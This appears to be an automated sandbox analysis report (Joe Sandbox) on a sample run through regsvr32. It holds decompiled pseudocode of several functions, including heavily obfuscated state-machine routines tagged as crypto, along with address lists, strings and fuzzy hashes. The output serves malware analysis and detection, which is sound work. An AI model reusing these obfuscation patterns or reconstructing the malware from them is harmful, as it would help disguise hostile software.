0x04b520a0
0x04b520a1
0x04b520a5
0x04b520ad
0x04b520b5
0x04b520b9
0x04b520be
0x04b520c6
0x04b520ce
0x04b520d6
0x04b520de
0x04b520e6
0x04b520ee
0x04b520fc
0x04b52100
0x04b52108
0x04b52110
0x04b52115
0x04b5211a
0x04b5211f
0x04b52127
0x04b5212f
0x04b52134
0x04b5213c
0x04b52144
0x04b52149
0x04b52151
0x04b52159
0x04b52161
0x04b5216e
0x04b52172
0x04b5217a
0x04b52182
0x04b5218a
0x04b52192
0x04b5219a
0x04b521a2
0x04b521af
0x04b521b3
0x04b521bb
0x04b521c3
0x04b521c8
0x04b521d0
0x04b521d8
0x04b521e0
0x04b521e8
0x04b521f0
0x04b521f8
0x04b52200
0x04b52208
0x04b52215
0x04b52220
0x04b5222b
0x04b52239
0x04b5223e
0x04b52244
0x04b5224c
0x04b52254
0x04b5225e
0x04b52261
0x04b52265
0x04b5226d
0x04b52275
0x04b5227d
0x04b52282
0x04b5228a
0x04b52292
0x04b522a2
0x04b522a6
0x04b522ab
0x04b522b0
0x04b522b8
0x04b522c0
0x04b522c5
0x04b522cd
0x04b522d8
0x04b522e3
0x04b522ee
0x04b522f6
0x04b522fe
0x04b52306
0x04b52311
0x04b5231c
0x04b52327
0x04b5232f
0x04b52337
0x04b5233f
0x04b5234c
0x04b5234f
0x04b52353
0x04b52357
0x04b5235c
0x04b52364
0x04b52374
0x04b52378
0x04b52380
0x04b52388
0x04b52390
0x04b52398
0x04b523a0
0x04b523ab
0x04b523b6
0x04b523c1
0x04b523cd
0x04b523d0
0x04b523d4
0x04b523dc
0x04b523e1
0x04b523e9
0x04b523f1
0x04b523f9
0x04b52401
0x04b52406
0x04b5240e
0x04b52416
0x04b52423
0x04b52427
0x04b5242f
0x04b52437
0x04b52442
0x04b5244d
0x04b52460
0x04b52474
0x04b52474
0x04b5247e
0x00000000
0x04b525e3
0x04b52486
0x04b52498
0x04b524a1
0x04b524a5
0x04b524b0
0x04b524bb
0x04b524c7
0x04b524de
0x04b52506
0x04b52523
0x04b52528
0x04b5252b
0x00000000
0x04b5252b
0x04b5248e
0x00000000
0x00000000
0x04b52494
0x04b52494
0x04b52532
0x04b5253b
0x04b5253f
0x04b52547
0x04b5254c
0x04b52571
0x04b5257d
0x04b52587
0x04b525a7
0x04b525ac
0x04b525af
0x04b525b1
0x04b525b1
0x04b525b1
0x00000000

Strings

qUO, xrefs: 04B520DE
Hz, xrefs: 04B523E9
-9, xrefs: 04B523B6
j8, xrefs: 04B5224C
XGH, xrefs: 04B52390

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: j8$qUO$-9$Hz$XGH
API String ID: 0-60989354
Opcode ID: 2883b189063e185fbada4d9f089a8edb3af8829d8f7ce3fae778755f21e5905d
Instruction ID: 6c667aa55b98ed69efdd7f02b9e8ae1ed5a853141aecc8ea44d6a11a20658e85
Opcode Fuzzy Hash: 2883b189063e185fbada4d9f089a8edb3af8829d8f7ce3fae778755f21e5905d
Instruction Fuzzy Hash: 59E11F715097809FC3A8CF25C989A4BFBE1FBC4748F508A1CF5EA86260D7B59948CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04B53EE9, Relevance: 6.5, Strings: 5, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04B53EE9() {
				intOrPtr _t261;
				intOrPtr _t262;
				void* _t268;
				signed char _t274;
				intOrPtr _t277;
				signed int _t288;
				intOrPtr _t289;
				signed char _t296;
				signed int _t316;
				intOrPtr _t326;
				intOrPtr _t330;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				intOrPtr _t342;
				void* _t344;

				 *(_t344 + 0x70) =  *(_t344 + 0x70) & 0x00000000;
				 *(_t344 + 0x74) =  *(_t344 + 0x74) & 0x00000000;
				_t288 = 0x4bd14f4;
				 *((intOrPtr*)(_t344 + 0x6c)) = 0x2dbabe;
				 *(_t344 + 0x4c) = 0x48601c;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) | 0x68876aab;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x68cba8bf;
				 *(_t344 + 8) = 0xdbf1f3;
				 *(_t344 + 0x18) =  *(_t344 + 8) * 9;
				_t333 = 0x4c;
				 *(_t344 + 0x1c) =  *(_t344 + 0x18) / _t333;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) << 0xd;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x4172a216;
				 *(_t344 + 0x3c) = 0x6d1b19;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) | 0x79048263;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) >> 5;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0x03cbeeb4;
				 *(_t344 + 0x18) = 0x1a2d0d;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) >> 6;
				_t334 = 9;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) / _t334;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) + 0xffff8a27;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) ^ 0xfffbe0f3;
				 *(_t344 + 0x5c) = 0xa7cc6c;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) >> 4;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) ^ 0x000a2772;
				 *(_t344 + 0x38) = 0x67bd1;
				_t335 = 0x3d;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) / _t335;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) << 0x10;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) ^ 0x1b333388;
				 *(_t344 + 0x28) = 0xde9e16;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) | 0xff1d3c4c;
				_t336 = 6;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) / _t336;
				_t337 = 0x70;
				 *(_t344 + 0x24) =  *(_t344 + 0x28) / _t337;
				 *(_t344 + 0x24) =  *(_t344 + 0x24) ^ 0x006adbe6;
				 *(_t344 + 0x20) = 0xac092b;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xc14e4d03;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) + 0x9f69;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0x18e1fb77;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xd908b9ac;
				 *(_t344 + 0x3c) = 0xd958f8;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xf9ce44cf;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) << 0xe;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xc707f990;
				 *(_t344 + 0x1c) = 0x265505;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xffff5b39;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0x9a51;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xc9e0;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x00291d5e;
				 *(_t344 + 0x4c) = 0xea08b8;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0xb1227b65;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) * 0x47;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x4e906ac6;
				 *(_t344 + 0x60) = 0x906ac9;
				_t338 = 0x13;
				_t330 =  *((intOrPtr*)(_t344 + 0x78));
				_t342 =  *((intOrPtr*)(_t344 + 0x78));
				 *(_t344 + 0x60) =  *(_t344 + 0x60) * 3;
				 *(_t344 + 0x60) =  *(_t344 + 0x60) ^ 0x01b02f9b;
				 *(_t344 + 0x48) = 0xe018a0;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) >> 3;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) << 4;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) ^ 0x01c3463d;
				 *(_t344 + 0x44) = 0xcf92eb;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) | 0xa78abf74;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) + 0x2871;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) ^ 0xa7cf65bf;
				 *(_t344 + 0x40) = 0xa30b5e;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) / _t338;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b52837;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b9bcfc;
				 *(_t344 + 0x50) = 0x1f98d4;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x1ce7877d;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) >> 9;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x000a2579;
				 *(_t344 + 0x64) = 0x5b61ba;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) + 0xffffd71d;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) ^ 0x005007f5;
				 *(_t344 + 0x2c) = 0xb4bbf5;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x03029a47;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) >> 0xf;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b7d07c;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b00a56;
				 *(_t344 + 0x28) = 0x1351a7;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) >> 9;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0xc8bf819f;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) * 0x2d;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0x49a4694e;
				 *(_t344 + 0x70) = 0x74ba7c;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3ad619e0;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3aa46fbb;
				 *(_t344 + 0x30) = 0x6db52d;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) << 9;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) + 0xffffb915;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) | 0x57796199;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) ^ 0xdf7399d9;
				 *(_t344 + 0x54) = 0x4f3eba;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) + 0xffff5dec;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) << 7;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) ^ 0x274d646c;
				while(1) {
					L1:
					_t316 =  *(_t344 + 0x68);
					while(1) {
						L2:
						_t261 =  *((intOrPtr*)(_t344 + 0x6c));
						L3:
						while(_t288 != 0x42bf5b6) {
							if(_t288 == 0x434f657) {
								_push( *(_t344 + 0x1c));
								_push( *(_t344 + 0x40));
								_push( *(_t344 + 0x28));
								 *((char*)(_t344 + 0x1f)) =  *((intOrPtr*)(_t330 + 1));
								 *(_t344 + 0x1e) =  *((intOrPtr*)(_t330 + 3));
								_t268 = E04B4E1F8(0x4b31758,  *(_t344 + 0x30), __eflags);
								_push( *(_t330 + 2) & 0x000000ff);
								L04B3F96F( *(_t344 + 0x74), __eflags, 0x10,  *(_t344 + 0x3f) & 0x000000ff, _t268,  *(_t344 + 0x1e) & 0x000000ff,  *((intOrPtr*)(_t344 + 0x84)), _t342 + 0x20,  *(_t330 + 2) & 0x000000ff,  *(_t344 + 0x60),  *((intOrPtr*)(_t344 + 0x58)),  *(_t344 + 0x50));
								_t223 = _t344 + 0x5c; // 0xa2772
								E04B4FECB(_t268,  *((intOrPtr*)(_t344 + 0x90)),  *((intOrPtr*)(_t344 + 0xa0)),  *(_t344 + 0x64),  *_t223);
								_t344 = _t344 + 0x40;
								 *(_t342 + 0x14) = ( *(_t330 + 4) & 0x000000ff) << 0x00000008 |  *(_t330 + 5) & 0x000000ff;
								_t274 =  *((intOrPtr*)(_t330 + 6));
								_t296 =  *((intOrPtr*)(_t330 + 7));
								_t330 = _t330 + 8;
								_t288 = 0x42bf5b6;
								 *(_t342 + 0x44) = (_t274 & 0x000000ff) << 0x00000008 | _t296 & 0x000000ff;
								goto L1;
							} else {
								if(_t288 == 0x4bd14f4) {
									_t326 =  *0x4b56228; // 0x0
									_t288 = 0x70ba79f;
									_t316 = _t326 + 0x14;
									 *(_t344 + 0x68) = _t316;
									goto L2;
								} else {
									if(_t288 == 0x70ba79f) {
										_t277 = E04B43D85( *(_t344 + 0x60), 0x4b56000, __eflags, _t344 + 0x78,  *(_t344 + 0x18));
										_t316 =  *(_t344 + 0x70);
										_t330 = _t277;
										 *((intOrPtr*)(_t344 + 0x7c)) = _t277;
										_t261 = _t277 +  *((intOrPtr*)(_t344 + 0x78));
										 *((intOrPtr*)(_t344 + 0x6c)) = _t261;
										_t288 = 0xc4a3c33;
										continue;
									} else {
										if(_t288 == 0x9fd5b32) {
											__eflags = _t330 - _t261;
											asm("sbb ecx, ecx");
											_t288 = (_t288 & 0x0165beb9) + 0xae47d7a;
											continue;
										} else {
											if(_t288 == 0xae47d7a) {
												L04B52B09( *((intOrPtr*)(_t344 + 0x78)),  *((intOrPtr*)(_t344 + 0x7c)),  *((intOrPtr*)(_t344 + 0x34)),  *(_t344 + 0x54));
											} else {
												if(_t288 != 0xc4a3c33) {
													L17:
													__eflags = _t288 - 0xd28cf5a;
													if(__eflags != 0) {
														L2:
														_t261 =  *((intOrPtr*)(_t344 + 0x6c));
														continue;
													}
												} else {
													_push(_t288);
													_push(_t288);
													_t342 = E04B3C5D8(0x60);
													_t344 = _t344 + 0xc;
													if(_t342 != 0) {
														_t288 = 0x434f657;
														while(1) {
															L1:
															_t316 =  *(_t344 + 0x68);
															while(1) {
																L2:
																_t261 =  *((intOrPtr*)(_t344 + 0x6c));
																goto L3;
															}
														}
													}
												}
											}
										}
									}
								}
							}
							_t289 =  *0x4b56228; // 0x0
							 *(_t289 + 0x1c) =  *(_t289 + 0x1c) & 0x00000000;
							 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 0x14));
							__eflags = 1;
							return 1;
						}
						_t262 =  *0x4b56228; // 0x0
						_t288 = 0x9fd5b32;
						 *_t316 = _t342;
						_t316 = _t342 + 0x18;
						 *(_t344 + 0x68) = _t316;
						_t235 = _t262 + 0x18;
						 *_t235 =  *((intOrPtr*)(_t262 + 0x18)) + 1;
						__eflags =  *_t235;
						goto L17;
					}
				}
			}

0x04b53eec
0x04b53ef3
0x04b53ef8
0x04b53efd
0x04b53f05
0x04b53f0d
0x04b53f15
0x04b53f1d
0x04b53f2e
0x04b53f38
0x04b53f3d
0x04b53f43
0x04b53f48
0x04b53f50
0x04b53f58
0x04b53f60
0x04b53f65
0x04b53f6d
0x04b53f75
0x04b53f7e
0x04b53f83
0x04b53f89
0x04b53f91
0x04b53f99
0x04b53fa1
0x04b53fa6
0x04b53fae
0x04b53fba
0x04b53fbf
0x04b53fc5
0x04b53fca
0x04b53fd2
0x04b53fda
0x04b53fe6
0x04b53feb
0x04b53ff5
0x04b53ff8
0x04b53ffc
0x04b54004
0x04b5400c
0x04b54014
0x04b5401c
0x04b54024
0x04b5402c
0x04b54034
0x04b5403c
0x04b54041
0x04b54049
0x04b54051
0x04b54059
0x04b54061
0x04b54069
0x04b54071
0x04b54079
0x04b54086
0x04b5408a
0x04b54094
0x04b540a3
0x04b540a4
0x04b540a8
0x04b540ac
0x04b540b0
0x04b540b8
0x04b540c0
0x04b540c5
0x04b540ca
0x04b540d2
0x04b540da
0x04b540e2
0x04b540ea
0x04b540f2
0x04b54100
0x04b54104
0x04b5410c
0x04b54114
0x04b5411c
0x04b54124
0x04b54129
0x04b54131
0x04b54139
0x04b54141
0x04b54149
0x04b54151
0x04b54159
0x04b5415e
0x04b54166
0x04b5416e
0x04b54176
0x04b5417b
0x04b54188
0x04b5418c
0x04b54194
0x04b5419c
0x04b541a4
0x04b541ac
0x04b541b4
0x04b541b9
0x04b541c1
0x04b541c9
0x04b541d1
0x04b541d9
0x04b541e1
0x04b541e6
0x04b541ee
0x04b541ee
0x04b541ee
0x04b541f2
0x04b541f2
0x04b541f2
0x00000000
0x04b541f6
0x04b54208
0x04b542d3
0x04b542df
0x04b542e5
0x04b542f0
0x04b542f7
0x04b542fb
0x04b5430a
0x04b54335
0x04b5433a
0x04b54352
0x04b5435b
0x04b54369
0x04b5436d
0x04b54370
0x04b54373
0x04b5437c
0x04b54388
0x00000000
0x04b5420e
0x04b54214
0x04b542bc
0x04b542c2
0x04b542c7
0x04b542ca
0x00000000
0x04b5421a
0x04b54220
0x04b54299
0x04b5429e
0x04b542a2
0x04b542a5
0x04b542a9
0x04b542ae
0x04b542b2
0x00000000
0x04b54222
0x04b54228
0x04b54272
0x04b54274
0x04b5427c
0x00000000
0x04b5422a
0x04b54230
0x04b543c4
0x04b54236
0x04b5423c
0x04b543a7
0x04b543a7
0x04b543ad
0x04b541f2
0x04b541f2
0x00000000
0x04b541f2
0x04b54242
0x04b54252
0x04b54253
0x04b5425b
0x04b5425d
0x04b54262
0x04b54268
0x04b541ee
0x04b541ee
0x04b541ee
0x04b541f2
0x04b541f2
0x04b541f2
0x00000000
0x04b541f2
0x04b541f2
0x04b541ee
0x04b54262
0x04b5423c
0x04b54230
0x04b54228
0x04b54220
0x04b54214
0x04b543cb
0x04b543d7
0x04b543db
0x04b543e0
0x04b543e5
0x04b543e5
0x04b54391
0x04b54396
0x04b5439b
0x04b5439d
0x04b543a0
0x04b543a4
0x04b543a4
0x04b543a4
0x00000000
0x04b543a4
0x04b541f2

Strings

ldM', xrefs: 04B541E6
z}, xrefs: 04B5422A
r', xrefs: 04B5433A
y%, xrefs: 04B54129
q(, xrefs: 04B540E2

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ldM'$q($r'$y%$z}
API String ID: 0-1771948706
Opcode ID: 44acb6a0d538a9f86307515a8b4664c120114249a752a760365027e1e163cdca
Instruction ID: 5367d6953f6146a1638dbf7b3f4f75d41bb45a1627978b63edc2dce6c80c6a4f
Opcode Fuzzy Hash: 44acb6a0d538a9f86307515a8b4664c120114249a752a760365027e1e163cdca
Instruction Fuzzy Hash: 23D14F721083809FD368CF25C48965BFFE2FB95358F148A0DF6A696260D3B5D949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 04B48D3D, Relevance: 6.4, Strings: 5, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B48D3D() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				intOrPtr* _t155;
				signed int _t170;
				void* _t172;
				signed int* _t174;

				_t174 =  &_v60;
				_v4 = _v4 & 0x00000000;
				_v16 = 0xb96ea3;
				_v12 = 0x2b597c;
				_v8 = 0x15d14c;
				_v24 = 0xfb9f01;
				_v24 = _v24 + 0xffffc2ea;
				_v24 = _v24 ^ 0x00f09b24;
				_v28 = 0x44d8ac;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x0118b46b;
				_v56 = 0xb4bcfb;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 + 0x1918;
				_t151 = 0x33;
				_v56 = _v56 / _t151;
				_t172 = 0x18a299a;
				_v56 = _v56 ^ 0x00075f97;
				_v60 = 0x54631c;
				_t152 = 0x32;
				_v60 = _v60 / _t152;
				_v60 = _v60 + 0xe0cb;
				_v60 = _v60 + 0x7b8a;
				_v60 = _v60 ^ 0x000a1fda;
				_v32 = 0x2b0ed;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 | 0x09ea9e28;
				_v32 = _v32 ^ 0x09ed7baa;
				_v48 = 0x16a7f0;
				_v48 = _v48 << 6;
				_t170 = 0x54;
				_v48 = _v48 / _t170;
				_t153 = 0x50;
				_v48 = _v48 / _t153;
				_v48 = _v48 ^ 0x000d9328;
				_v52 = 0x3f1fdb;
				_v52 = _v52 | 0x0053e637;
				_v52 = _v52 ^ 0xce168c33;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0ce6f5f4;
				_v36 = 0x33e495;
				_v36 = _v36 + 0xc7cc;
				_v36 = _v36 / _t170;
				_v36 = _v36 + 0x230d;
				_v36 = _v36 ^ 0x000308d4;
				_v40 = 0xaa804b;
				_t139 = _v40;
				_t154 = 0x42;
				_t169 = _t139 % _t154;
				_v40 = _t139 / _t154;
				_v40 = _v40 + 0xffff246c;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x000d5f20;
				_v44 = 0x5ad1c5;
				_v44 = _v44 + 0x4d5e;
				_v44 = _v44 + 0xffff9f53;
				_v44 = _v44 + 0xffff11b0;
				_v44 = _v44 ^ 0x005bbdbb;
				_v20 = 0x89125f;
				_v20 = _v20 ^ 0x0bb83411;
				_v20 = _v20 ^ 0x0b3ba340;
				_t155 =  *0x4b56208; // 0x0
				do {
					while(_t172 != 0x550abf) {
						if(_t172 == 0x18a299a) {
							_push(_t155);
							_push(_t155);
							_t155 = E04B3C5D8(0x2c);
							_t174 =  &(_t174[3]);
							 *0x4b56208 = _t155;
							_t172 = 0x550abf;
							continue;
						} else {
							if(_t172 != 0x6125a42) {
								goto L8;
							} else {
								_t147 = E04B40EBC(_v36, _t169, _v40, _t155, _v44, _v20, _t155, _t155, 0, E04B536AA);
								_t155 =  *0x4b56208; // 0x0
								 *_t155 = _t147;
							}
						}
						L5:
						return 0 | _t155 != 0x00000000;
					}
					_t169 = _v48;
					_t141 = E04B348DD(_v32, _v48, _v52);
					_t155 =  *0x4b56208; // 0x0
					_t174 = _t174 - 0x10 + 0x14;
					_t172 = 0x6125a42;
					 *((intOrPtr*)(_t155 + 0x18)) = _t141;
					L8:
				} while (_t172 != 0x92686f5);
				goto L5;
			}

0x04b48d3d
0x04b48d40
0x04b48d47
0x04b48d4f
0x04b48d57
0x04b48d5f
0x04b48d67
0x04b48d6f
0x04b48d77
0x04b48d7f
0x04b48d84
0x04b48d8c
0x04b48d94
0x04b48d99
0x04b48dab
0x04b48db5
0x04b48db9
0x04b48dbb
0x04b48dc3
0x04b48dd1
0x04b48dd6
0x04b48dda
0x04b48de2
0x04b48dea
0x04b48df2
0x04b48dfa
0x04b48dff
0x04b48e07
0x04b48e0f
0x04b48e17
0x04b48e22
0x04b48e27
0x04b48e31
0x04b48e36
0x04b48e3a
0x04b48e42
0x04b48e4a
0x04b48e52
0x04b48e5a
0x04b48e5f
0x04b48e67
0x04b48e6f
0x04b48e7f
0x04b48e85
0x04b48e8d
0x04b48e95
0x04b48e9d
0x04b48ea1
0x04b48ea2
0x04b48ea4
0x04b48ea8
0x04b48eb0
0x04b48eb5
0x04b48ebd
0x04b48ec5
0x04b48ecd
0x04b48ed5
0x04b48ee2
0x04b48eef
0x04b48ef7
0x04b48eff
0x04b48f07
0x04b48f0d
0x04b48f0d
0x04b48f13
0x04b48f66
0x04b48f67
0x04b48f6f
0x04b48f71
0x04b48f74
0x04b48f7a
0x00000000
0x04b48f15
0x04b48f17
0x00000000
0x04b48f1d
0x04b48f37
0x04b48f3c
0x04b48f45
0x04b48f45
0x04b48f17
0x04b48f48
0x04b48f55
0x04b48f55
0x04b48f85
0x04b48f8d
0x04b48f92
0x04b48f98
0x04b48f9b
0x04b48f9d
0x04b48fa0
0x04b48fa0
0x00000000

Strings

_, xrefs: 04B48EB5
7S, xrefs: 04B48E4A
#, xrefs: 04B48E85
^M, xrefs: 04B48EC5
|Y+, xrefs: 04B48D4F

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #$ _$7S$^M$|Y+
API String ID: 0-3744723356
Opcode ID: 6861dd1a7d82b262feacc47c520d15349d4438a0b2bb399d04cdf34b67cf6426
Instruction ID: 32139874444cc5305cfdb982502fcf10713b252a95067d5b14fc617d7ca9dfc0
Opcode Fuzzy Hash: 6861dd1a7d82b262feacc47c520d15349d4438a0b2bb399d04cdf34b67cf6426
Instruction Fuzzy Hash: A95156725083419FD348DF25D48A50BBBE1FBC8768F008E1DF599A6260D3B9DA49CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 100126F9, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100126F9(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E100122B0(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1000D5EC(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

0x100126fd
0x100126ff
0x10012701
0x10012705
0x10012707
0x1001273c
0x10012746
0x10012748
0x1001274f
0x1001274f
0x00000000
0x10012755
0x1001270e
0x1001271b
0x10012723
0x00000000
0x00000000
0x10012727
0x1001272d
0x10012731
0x1001273a
0x00000000
0x1001273a
0x1001275b

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1001271B
LoadResource.KERNEL32(?,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012727
LockResource.KERNEL32(00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012734
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 1001274F

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
Instruction ID: 32ecfa8a0ceb179aec2dc768c20ccd4f8790d9104fa4174b83ef058a4c527ff5
Opcode Fuzzy Hash: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
Instruction Fuzzy Hash: 54F090762042226FA3019B675C88A3BB7ECEFC55E2B110039FE04D6291EE35CC629771

Uniqueness

Uniqueness Score: -1.00%

Function 1000FF59, Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000FF59(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E10012862(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E1000FAB8(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E1000A7CE();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x1000ff5c
0x1000ff68
0x1000ffb0
0x1000ffb2
0x1000ffb9
0x00000000
0x1000ffbb
0x1000ff6f
0x1000ff73
0x00000000
0x00000000
0x1000ff75
0x1000ff82
0x00000000
0x1000ff96
0x1000ffa5
0x00000000
0x1000ffad

APIs

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

GetKeyState.USER32 ref: 1000FF7D
